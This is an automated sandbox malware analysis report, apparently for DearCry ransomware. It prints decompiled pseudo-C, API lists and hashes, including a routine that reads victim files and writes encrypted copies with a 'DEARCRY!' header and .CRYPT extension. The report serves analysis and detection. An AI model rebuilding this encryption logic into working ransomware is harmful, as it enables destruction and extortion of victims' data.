                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Service_calloc$CtrlDispatcherStartStatus_getenv_memset_sprintf
                                                              • String ID: msupdate
                                                              • API String ID: 3495658242-3668653166
                                                              • Opcode ID: bce472a916451ea2b4466cfb5eff53bf406c664cc63425b5c2ddccd02e47ae04
                                                              • Instruction ID: 63469c78dbc92eba2794fa6175ed4eb5947b687bf2814ee1ec5df824e43d2d2a
                                                              • Opcode Fuzzy Hash: bce472a916451ea2b4466cfb5eff53bf406c664cc63425b5c2ddccd02e47ae04
                                                              • Instruction Fuzzy Hash: 00E0ECB14182045E8790FF78C90624ABBE8DA44214F10CEBEA4ACC2250EA7095159B97
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B91231, Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 303stringCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 59%
                                                              			E00B91231(void* __ebx, void* __edi) {
				void* __esi;
				signed int _t62;
				intOrPtr _t71;
				intOrPtr _t81;
				intOrPtr _t86;
				intOrPtr _t94;
				void* _t98;
				intOrPtr _t100;
				intOrPtr _t103;
				intOrPtr _t106;
				void* _t110;
				intOrPtr _t112;
				void* _t119;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t133;
				intOrPtr _t139;
				void* _t144;
				intOrPtr _t147;
				intOrPtr _t148;
				void* _t149;
				CHAR* _t150;
				void* _t151;
				signed int _t152;
				void* _t154;
				void* _t158;
				intOrPtr _t159;
				void* _t160;
				signed int _t161;
				void* _t163;
				void* _t164;
				void* _t165;
				void* _t166;
				void* _t167;

				_t143 = __edi;
				lstrcpynA(_t160 + 0xb8, _t150, 0x50c);
				lstrcatA(_t160 + 0xb4, ".CRYPT");
				_t62 = L00C6A96D(_t150, "rb+"); // executed
				_t161 = _t160 + 8;
				 *(_t161 + 0x14) = _t62;
				if(_t62 == __edi) {
					L31:
					_t63 = _t62 | 0xffffffff;
				} else {
					_t137 = _t161 + 0xb0;
					_t62 = L00C6A96D(_t161 + 0xb0, "wb"); // executed
					_t152 = _t62;
					_t161 = _t161 + 8;
					_t169 = _t152 - __edi;
					if(_t152 == __edi) {
						goto L31;
					} else {
						 *((char*)(_t161 + 0x88)) = 0;
						E00C6BB40(__edi, _t161 + 0x81, __edi, 0x30);
						_push(0x30);
						_push(_t161 + 0x88);
						E00B96FF0();
						_push(_t152);
						_push(8);
						_push(1);
						_push("DEARCRY!"); // executed
						E00C6ADA3(__ebx, _t137, _t143, _t152, _t169); // executed
						_t8 = E00B970E0(_t137, _t169, _t154) + 1; // 0x1
						_t120 = _t8;
						_t145 = E00C6A294(_t8, _t137, _t143, _t8);
						_t71 = E00C6BB40(_t145, _t145, 0, _t120);
						_push(1);
						_push(_t154);
						_push(_t145);
						_t138 = _t161 + 0xc0;
						_push(_t161 + 0xc0);
						E00B97100(0x30);
						_t163 = _t161 + 0x4c;
						 *((intOrPtr*)(_t163 + 0x24)) = _t71;
						_t170 = _t71;
						if(_t71 >= 0) {
							_push(_t152);
							_push(4);
							_push(1);
							_push(_t163 + 0x2c);
							E00C6ADA3(_t120, _t138, _t145, _t152, __eflags);
							_t139 =  *((intOrPtr*)(_t163 + 0x34));
							_push(_t152);
							_push(_t139);
							_push(1);
							_push(_t145);
							E00C6ADA3(_t120, _t139, _t145, _t152, __eflags);
							asm("cdq");
							_t120 = _t139;
							_push(_t145);
							asm("adc ebx, 0x0");
							E00C69CB2(_t120, _t139, _t145, _t152, __eflags);
							_push(_t152);
							_push(4);
							_push(1);
							_push(_t163 + 0x68);
							 *((intOrPtr*)(_t163 + 0x70)) = 4;
							E00C6ADA3(_t120, _t139, _t145, _t152, __eflags);
							_t140 =  *((intOrPtr*)(_t163 + 0x60));
							E00C69E5A( *((intOrPtr*)(_t163 + 0x60)),  *((intOrPtr*)(_t163 + 0x60)), _t163 + 0x74); // executed
							_push(_t152);
							_push(8);
							_push(1);
							_push(_t163 + 0x9c);
							E00C6ADA3(_t120,  *((intOrPtr*)(_t163 + 0x60)), _t145, _t152, __eflags);
							_t164 = _t163 + 0x4c;
							_t158 =  *((intOrPtr*)(_t163 + 0x44)) + 0x18;
							asm("adc ebx, 0x0");
							_t81 = E00B95990();
							_t146 = _t81;
							 *((intOrPtr*)(_t164 + 0x38)) = _t81;
							E00B96270(_t140, _t81, E00B92F00(), 0, 0, 0, 1);
							_t137 = _t164 + 0x9c;
							E00B96270(_t164 + 0x9c, _t146, 0, 0, _t164 + 0x9c, _t164 + 0xb8, 1);
							_t86 = E00C6AC24( *((intOrPtr*)(_t164 + 0x60)), 1, 0x100000,  *((intOrPtr*)(_t164 + 0x44))); // executed
							_t147 = _t86;
							_t165 = _t164 + 0x40;
							__eflags = _t147;
							if(__eflags <= 0) {
								L8:
								_t121 =  *((intOrPtr*)(_t165 + 0x20));
								_t148 =  *((intOrPtr*)(_t165 + 0x28));
								E00B96580(_t148, _t121, _t165 + 0x10);
								_push(_t152);
								_push( *((intOrPtr*)(_t165 + 0x1c)));
								_push(1);
								_push(_t121);
								E00C6ADA3(_t121, _t137, _t148, _t152, __eflags);
								E00B95920(_t137, _t148, _t148);
								_push(_t148);
								E00C69CB2(_t121, _t137, _t148, _t152, __eflags);
								_push(_t152); // executed
								E00C6B1A7(_t121, _t137, _t148, _t152, __eflags); // executed
								_t159 =  *((intOrPtr*)(_t165 + 0x3c));
								_push(0);
								_push(0);
								_push(0);
								_push(_t159); // executed
								E00C6A637(_t121, _t137, _t148, _t152, __eflags); // executed
								_t122 =  *((intOrPtr*)(_t165 + 0x54));
								_t166 = _t165 + 0x38;
								__eflags = _t122;
								if(__eflags < 0) {
									L12:
									_t94 =  *((intOrPtr*)(_t166 + 0x18));
								} else {
									if(__eflags > 0) {
										L11:
										_t94 = 0x100000;
									} else {
										__eflags =  *((intOrPtr*)(_t166 + 0x18)) - 0x100000;
										if( *((intOrPtr*)(_t166 + 0x18)) <= 0x100000) {
											goto L12;
										} else {
											goto L11;
										}
									}
								}
								_t149 = 0;
								 *((intOrPtr*)(_t166 + 0x10)) = _t94;
								__eflags = _t122;
								if(__eflags >= 0) {
									if(__eflags > 0) {
										goto L18;
									} else {
										__eflags =  *((intOrPtr*)(_t166 + 0x18));
										if(__eflags > 0) {
											while(1) {
												L18:
												__eflags = _t94;
												if(__eflags < 0) {
													_t94 = 0x100000;
													 *((intOrPtr*)(_t166 + 0x10)) = 0x100000;
												}
												_push(_t159);
												_push(_t94);
												_push(1);
												_push(0xcc9fb0); // executed
												_t98 = E00C6ADA3(_t122, _t137, _t149, 0, __eflags); // executed
												asm("cdq");
												_t167 = _t166 + 0x10;
												_t149 = _t149 + _t98;
												asm("adc esi, edx");
												_t100 =  *((intOrPtr*)(_t167 + 0x18)) - _t149;
												__eflags = _t100;
												_t137 = _t122;
												asm("sbb edx, esi");
												 *((intOrPtr*)(_t167 + 0x34)) = _t122;
												if(__eflags < 0) {
													L24:
													 *((intOrPtr*)(_t167 + 0x10)) = _t100;
												} else {
													if(__eflags > 0) {
														L23:
														 *((intOrPtr*)(_t167 + 0x10)) = 0x100000;
													} else {
														__eflags = _t100 - 0x100000;
														if(__eflags <= 0) {
															goto L24;
														} else {
															goto L23;
														}
													}
												}
												_push(0);
												_push(0);
												_push(_t149);
												_push(_t159); // executed
												E00C6A637(_t122, _t137, _t149, 0, __eflags); // executed
												_t166 = _t167 + 0x10;
												__eflags = 0 - _t122;
												if(__eflags < 0) {
													L17:
													_t94 =  *((intOrPtr*)(_t166 + 0x10));
													continue;
												}
												if(__eflags <= 0) {
													__eflags = _t149 -  *((intOrPtr*)(_t166 + 0x18));
													if(__eflags < 0) {
														goto L17;
													}
												}
												goto L28;
											}
										}
									}
								}
								L28:
								_push(_t159);
								E00C6B1A7(_t122, _t137, _t149, 0, __eflags);
								E00C6A686( *((intOrPtr*)(_t166 + 0x30))); // executed
								_t161 = _t166 + 8;
								_t63 = 0;
							} else {
								while(1) {
									asm("cdq");
									_t133 =  *((intOrPtr*)(_t165 + 0x18)) + _t147;
									_t103 =  *((intOrPtr*)(_t165 + 0x1c));
									asm("adc eax, edx");
									_push(0);
									_push(_t103);
									_push(_t133);
									 *((intOrPtr*)(_t165 + 0x28)) = _t133;
									 *((intOrPtr*)(_t165 + 0x2c)) = _t103;
									E00C6A637(_t120,  *((intOrPtr*)(_t165 + 0x14)), _t147, _t152, __eflags); // executed
									_t142 =  *((intOrPtr*)(_t165 + 0x38));
									_t145 =  *((intOrPtr*)(_t165 + 0x44));
									_t106 = E00B96560( *((intOrPtr*)(_t165 + 0x38)),  *((intOrPtr*)(_t165 + 0x38)),  *((intOrPtr*)(_t165 + 0x30)), _t165 + 0x28,  *((intOrPtr*)(_t165 + 0x44)), _t147,  *((intOrPtr*)(_t165 + 0x14)));
									_t163 = _t165 + 0x24;
									__eflags = _t106;
									if(__eflags == 0) {
										break;
									}
									_push(_t152);
									_push( *((intOrPtr*)(_t163 + 0x10)));
									_push(1);
									_push( *((intOrPtr*)(_t163 + 0x20))); // executed
									_t110 = E00C6ADA3(_t120, _t142, _t145, _t152, __eflags); // executed
									asm("cdq");
									_t158 = _t158 + _t110;
									_push(0);
									asm("adc ebx, edx");
									_push(_t120);
									_push(_t158);
									_push(_t152); // executed
									E00C6A637(_t120, _t142, _t145, _t152, __eflags); // executed
									_t137 =  *((intOrPtr*)(_t163 + 0x34));
									_t112 = E00C6AC24(_t145, 1, 0x100000,  *((intOrPtr*)(_t163 + 0x34))); // executed
									_t147 = _t112;
									_t165 = _t163 + 0x30;
									__eflags = _t147;
									if(__eflags > 0) {
										continue;
									} else {
										goto L8;
									}
									goto L32;
								}
								E00B959B0(_t145,  *((intOrPtr*)(_t163 + 0x28)));
								_push(_t152);
								E00C6B1A7(_t120, _t142, _t145, _t152, __eflags);
								_t137 =  *((intOrPtr*)(_t163 + 0x1c));
								_push( *((intOrPtr*)(_t163 + 0x1c)));
								goto L30;
							}
						} else {
							E00B967B0(_t120, _t145, _t154, E00C6A3E6() + 0x20);
							_push(_t152);
							E00C6B1A7(_t120, _t138, _t145, _t152, _t170);
							_push( *((intOrPtr*)(_t163 + 0x1c)));
							L30:
							_t62 = E00C6B1A7(_t120, _t137, _t145, _t152, _t170);
							_t161 = _t163 + 0xc;
							goto L31;
						}
					}
				}
				L32:
				_pop(_t144);
				_pop(_t151);
				_pop(_t119);
				return E00C69C26(_t63, _t119,  *(_t161 + 0x5cc) ^ _t161, _t137, _t144, _t151);
			}





































                                                              0x00b91231
                                                              0x00b91254
                                                              0x00b91267
                                                              0x00b91273
                                                              0x00b91278
                                                              0x00b9127b
                                                              0x00b91281
                                                              0x00b915ab
                                                              0x00b915ab
                                                              0x00b91287
                                                              0x00b91287
                                                              0x00b91294
                                                              0x00b91299
                                                              0x00b9129b
                                                              0x00b9129e
                                                              0x00b912a0
                                                              0x00000000
                                                              0x00b912a6
                                                              0x00b912b1
                                                              0x00b912b9
                                                              0x00b912c5
                                                              0x00b912c7
                                                              0x00b912c8
                                                              0x00b912cd
                                                              0x00b912ce
                                                              0x00b912d0
                                                              0x00b912d2
                                                              0x00b912d7
                                                              0x00b912e2
                                                              0x00b912e2
                                                              0x00b912ec
                                                              0x00b912f1
                                                              0x00b912f6
                                                              0x00b912f8
                                                              0x00b912f9
                                                              0x00b912fa
                                                              0x00b91301
                                                              0x00b91304
                                                              0x00b91309
                                                              0x00b9130c
                                                              0x00b91310
                                                              0x00b91312
                                                              0x00b91332
                                                              0x00b91333
                                                              0x00b91339
                                                              0x00b9133b
                                                              0x00b9133c
                                                              0x00b91341
                                                              0x00b91345
                                                              0x00b91346
                                                              0x00b91347
                                                              0x00b91349
                                                              0x00b9134a
                                                              0x00b91353
                                                              0x00b91356
                                                              0x00b9135b
                                                              0x00b9135c
                                                              0x00b9135f
                                                              0x00b91364
                                                              0x00b91365
                                                              0x00b9136b
                                                              0x00b9136d
                                                              0x00b9136e
                                                              0x00b91376
                                                              0x00b9137b
                                                              0x00b91385
                                                              0x00b9138a
                                                              0x00b9138b
                                                              0x00b91394
                                                              0x00b91396
                                                              0x00b91397
                                                              0x00b9139c
                                                              0x00b9139f
                                                              0x00b913a2
                                                              0x00b913a5
                                                              0x00b913ae
                                                              0x00b913b4
                                                              0x00b913bf
                                                              0x00b913ce
                                                              0x00b913db
                                                              0x00b913f1
                                                              0x00b913f6
                                                              0x00b913f8
                                                              0x00b913fb
                                                              0x00b913fd
                                                              0x00b9148d
                                                              0x00b9148d
                                                              0x00b91491
                                                              0x00b9149c
                                                              0x00b914a5
                                                              0x00b914a6
                                                              0x00b914a7
                                                              0x00b914a9
                                                              0x00b914aa
                                                              0x00b914b0
                                                              0x00b914b5
                                                              0x00b914b6
                                                              0x00b914bb
                                                              0x00b914bc
                                                              0x00b914c1
                                                              0x00b914c5
                                                              0x00b914c7
                                                              0x00b914c9
                                                              0x00b914cb
                                                              0x00b914cc
                                                              0x00b914d1
                                                              0x00b914d5
                                                              0x00b914d8
                                                              0x00b914da
                                                              0x00b914ef
                                                              0x00b914ef
                                                              0x00b914dc
                                                              0x00b914dc
                                                              0x00b914e8
                                                              0x00b914e8
                                                              0x00b914de
                                                              0x00b914de
                                                              0x00b914e6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b914e6
                                                              0x00b914dc
                                                              0x00b914f3
                                                              0x00b914f7
                                                              0x00b914fb
                                                              0x00b914fd
                                                              0x00b914ff
                                                              0x00000000
                                                              0x00b91501
                                                              0x00b91501
                                                              0x00b91505
                                                              0x00b91514
                                                              0x00b91514
                                                              0x00b91514
                                                              0x00b91516
                                                              0x00b91518
                                                              0x00b9151d
                                                              0x00b9151d
                                                              0x00b91521
                                                              0x00b91522
                                                              0x00b91523
                                                              0x00b91525
                                                              0x00b9152a
                                                              0x00b9152f
                                                              0x00b91530
                                                              0x00b91533
                                                              0x00b91539
                                                              0x00b9153b
                                                              0x00b9153b
                                                              0x00b9153d
                                                              0x00b9153f
                                                              0x00b91541
                                                              0x00b91545
                                                              0x00b9155a
                                                              0x00b9155a
                                                              0x00b91547
                                                              0x00b91547
                                                              0x00b91550
                                                              0x00b91550
                                                              0x00b91549
                                                              0x00b91549
                                                              0x00b9154e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9154e
                                                              0x00b91547
                                                              0x00b9155e
                                                              0x00b91560
                                                              0x00b91561
                                                              0x00b91562
                                                              0x00b91563
                                                              0x00b91568
                                                              0x00b9156b
                                                              0x00b9156d
                                                              0x00b91510
                                                              0x00b91510
                                                              0x00000000
                                                              0x00b91510
                                                              0x00b9156f
                                                              0x00b91571
                                                              0x00b91575
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91575
                                                              0x00000000
                                                              0x00b9156f
                                                              0x00b91514
                                                              0x00b91505
                                                              0x00b914ff
                                                              0x00b91577
                                                              0x00b91577
                                                              0x00b91578
                                                              0x00b91582
                                                              0x00b91587
                                                              0x00b9158a
                                                              0x00b91403
                                                              0x00b91403
                                                              0x00b91409
                                                              0x00b9140a
                                                              0x00b9140c
                                                              0x00b91410
                                                              0x00b91416
                                                              0x00b91418
                                                              0x00b91419
                                                              0x00b9141b
                                                              0x00b9141f
                                                              0x00b91423
                                                              0x00b9142c
                                                              0x00b91431
                                                              0x00b9143d
                                                              0x00b91442
                                                              0x00b91445
                                                              0x00b91447
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91455
                                                              0x00b91456
                                                              0x00b91457
                                                              0x00b91459
                                                              0x00b9145a
                                                              0x00b9145f
                                                              0x00b91460
                                                              0x00b91462
                                                              0x00b91464
                                                              0x00b91466
                                                              0x00b91467
                                                              0x00b91468
                                                              0x00b91469
                                                              0x00b9146e
                                                              0x00b9147b
                                                              0x00b91480
                                                              0x00b91482
                                                              0x00b91485
                                                              0x00b91487
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b91487
                                                              0x00b91593
                                                              0x00b91598
                                                              0x00b91599
                                                              0x00b9159e
                                                              0x00b915a2
                                                              0x00000000
                                                              0x00b915a2
                                                              0x00b91314
                                                              0x00b9131d
                                                              0x00b91322
                                                              0x00b91323
                                                              0x00b9132c
                                                              0x00b915a3
                                                              0x00b915a3
                                                              0x00b915a8
                                                              0x00000000
                                                              0x00b915a8
                                                              0x00b91312
                                                              0x00b912a0
                                                              0x00b915ae
                                                              0x00b915b5
                                                              0x00b915b6
                                                              0x00b915b8
                                                              0x00b915c6

                                                              APIs
                                                              • lstrcpynA.KERNEL32(?), ref: 00B91254
                                                              • lstrcatA.KERNEL32(?,.CRYPT), ref: 00B91267
                                                              • _memset.LIBCMT ref: 00B912B9
                                                              • _malloc.LIBCMT ref: 00B912E6
                                                                • Part of subcall function 00C6A294: __FF_MSGBANNER.LIBCMT ref: 00C6A2B7
                                                                • Part of subcall function 00C6A294: __NMSG_WRITE.LIBCMT ref: 00C6A2BE
                                                                • Part of subcall function 00C6A294: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00C716F3,?,00000001,?,?,00C6FCCA,00000018,00CBFCA8,0000000C,00C6FD5B), ref: 00C6A30B
                                                              • _memset.LIBCMT ref: 00B912F1
                                                              • __stat64.LIBCMT ref: 00B91385
                                                              • __fread_nolock.LIBCMT ref: 00B913F1
                                                                • Part of subcall function 00C6B1A7: __lock_file.LIBCMT ref: 00C6B1F7
                                                                • Part of subcall function 00C6B1A7: __fclose_nolock.LIBCMT ref: 00C6B201
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _memset$AllocateHeap__fclose_nolock__fread_nolock__lock_file__stat64_malloclstrcatlstrcpyn
                                                              • String ID: .CRYPT$DEARCRY!$rb+
                                                              • API String ID: 3584694502-2391147945
                                                              • Opcode ID: d80be42e3db7f9423c05e96634e3f40ca5ad9d12b83c9ed055dbd51be9f38576
                                                              • Instruction ID: b59604bf30d7f2ac75c8060e54ae62e359d0a34f8891479ca7c2b223b3041c53
                                                              • Opcode Fuzzy Hash: d80be42e3db7f9423c05e96634e3f40ca5ad9d12b83c9ed055dbd51be9f38576
                                                              • Instruction Fuzzy Hash: B091D3716443017BE620EB64CCC2F6FB6E9AFC4B40F05492CF645A6281DBB1E9059B63
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00C6A984, Relevance: 10.7, APIs: 7, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 85%
                                                              			E00C6A984(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t134;

				_t125 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t131 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t138 = _t121;
					if(_t121 != 0) {
						_t133 = _a20;
						__eflags = _t133;
						if(_t133 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E00C6BB40(_t131, _t121, _t131, _t119);
								_t134 = _t134 + 0xc;
							}
							__eflags = _t133 - _t131;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t125 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t131 = _a12 * _a16;
								__eflags =  *(_t133 + 0xc) & 0x0000010c;
								_v20 = _t131;
								_t120 = _t131;
								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t133 + 0xc) & 0x0000010c;
										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E00C723C3(_t120, _t125, _t133); // executed
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t131 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E00C6BB40(_t131, _a4, 0, _a8);
														_t134 = _t134 + 0xc;
													}
													 *((intOrPtr*)(E00C6D8C9(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E00C6FB6E(_t125, _t131, _t133);
													goto L5;
												}
												_t123 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t133 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t125 = _t55;
													_t110 = _t120;
												} else {
													_t125 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t125;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_t106 = E00C6D3F3(_t133);
												_pop(_t123);
												_push(_t106); // executed
												_t107 = E00C72AB0(_t120, _t125, _t131, _t133, __eflags); // executed
												_t134 = _t134 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t133 + 0xc;
													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t133 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t131 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t131 = _t113;
										}
										__eflags = _t131 - _v8;
										if(_t131 > _v8) {
											_t133 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E00C6BB40(_t131, _a4, 0, _a8);
												_t134 = _t134 + 0xc;
											}
											_t114 = E00C6D8C9(__eflags);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											 *_t114 = 0x22;
											_push(_t133);
											goto L4;
										} else {
											E00C72BAD(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
											 *_t133 =  *_t133 + _t131;
											_v12 = _v12 + _t131;
											_t120 = _t120 - _t131;
											_t134 = _t134 + 0x10;
											_v8 = _v8 - _t131;
											_t131 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t125 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E00C6D8C9(_t138);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					 *_t92 = 0x16;
					_push(_t131);
					goto L4;
				}
			}





























                                                              0x00c6a984
                                                              0x00c6a98c
                                                              0x00c6a990
                                                              0x00c6a995
                                                              0x00c6a997
                                                              0x00c6a99a
                                                              0x00c6a9a0
                                                              0x00c6a9c3
                                                              0x00000000
                                                              0x00c6a9a7
                                                              0x00c6a9a7
                                                              0x00c6a9a9
                                                              0x00c6a9ca
                                                              0x00c6a9cd
                                                              0x00c6a9cf
                                                              0x00c6a9de
                                                              0x00c6a9de
                                                              0x00c6a9e1
                                                              0x00c6a9e6
                                                              0x00c6a9eb
                                                              0x00c6a9eb
                                                              0x00c6a9ee
                                                              0x00c6a9f0
                                                              0x00000000
                                                              0x00c6a9f2
                                                              0x00c6a9f2
                                                              0x00c6a9f7
                                                              0x00c6a9fa
                                                              0x00c6a9fd
                                                              0x00000000
                                                              0x00000000
                                                              0x00c6a9ff
                                                              0x00c6aa02
                                                              0x00c6aa06
                                                              0x00c6aa0d
                                                              0x00c6aa10
                                                              0x00c6aa12
                                                              0x00c6aa1c
                                                              0x00c6aa14
                                                              0x00c6aa17
                                                              0x00c6aa17
                                                              0x00c6aa23
                                                              0x00c6aa25
                                                              0x00c6ab15
                                                              0x00000000
                                                              0x00c6aa2b
                                                              0x00c6aa2b
                                                              0x00c6aa2b
                                                              0x00c6aa32
                                                              0x00c6aa78
                                                              0x00c6aa78
                                                              0x00c6aa7b
                                                              0x00c6aae6
                                                              0x00c6aaec
                                                              0x00c6aaef
                                                              0x00c6ab7a
                                                              0x00000000
                                                              0x00c6ab80
                                                              0x00c6aaf5
                                                              0x00c6aaf9
                                                              0x00c6ab49
                                                              0x00c6ab49
                                                              0x00c6ab4d
                                                              0x00c6ab57
                                                              0x00c6ab5c
                                                              0x00c6ab5c
                                                              0x00c6ab64
                                                              0x00c6ab6c
                                                              0x00c6ab6d
                                                              0x00c6ab6e
                                                              0x00c6ab6f
                                                              0x00c6ab70
                                                              0x00c6a9bb
                                                              0x00c6a9bb
                                                              0x00000000
                                                              0x00c6a9c0
                                                              0x00c6aafb
                                                              0x00c6aafe
                                                              0x00c6ab01
                                                              0x00c6ab06
                                                              0x00c6ab07
                                                              0x00c6ab07
                                                              0x00c6ab07
                                                              0x00c6ab0a
                                                              0x00000000
                                                              0x00c6ab0a
                                                              0x00c6aa7d
                                                              0x00c6aa81
                                                              0x00c6aaa2
                                                              0x00c6aaa7
                                                              0x00c6aaa9
                                                              0x00c6aaab
                                                              0x00c6aaab
                                                              0x00c6aa83
                                                              0x00c6aa8a
                                                              0x00c6aa8c
                                                              0x00c6aa99
                                                              0x00c6aa99
                                                              0x00c6aa99
                                                              0x00c6aa9c
                                                              0x00c6aa8e
                                                              0x00c6aa90
                                                              0x00c6aa93
                                                              0x00c6aa93
                                                              0x00c6aa9e
                                                              0x00c6aa9e
                                                              0x00c6aaad
                                                              0x00c6aab0
                                                              0x00000000
                                                              0x00c6aab6
                                                              0x00c6aab6
                                                              0x00c6aab7
                                                              0x00c6aabb
                                                              0x00c6aac0
                                                              0x00c6aac1
                                                              0x00c6aac2
                                                              0x00c6aac7
                                                              0x00c6aaca
                                                              0x00c6aacc
                                                              0x00c6ab88
                                                              0x00000000
                                                              0x00c6ab88
                                                              0x00c6aad2
                                                              0x00c6aad5
                                                              0x00c6ab76
                                                              0x00c6ab76
                                                              0x00c6ab76
                                                              0x00c6ab76
                                                              0x00000000
                                                              0x00c6ab76
                                                              0x00c6aadb
                                                              0x00c6aade
                                                              0x00c6aae0
                                                              0x00000000
                                                              0x00c6aae0
                                                              0x00c6aab0
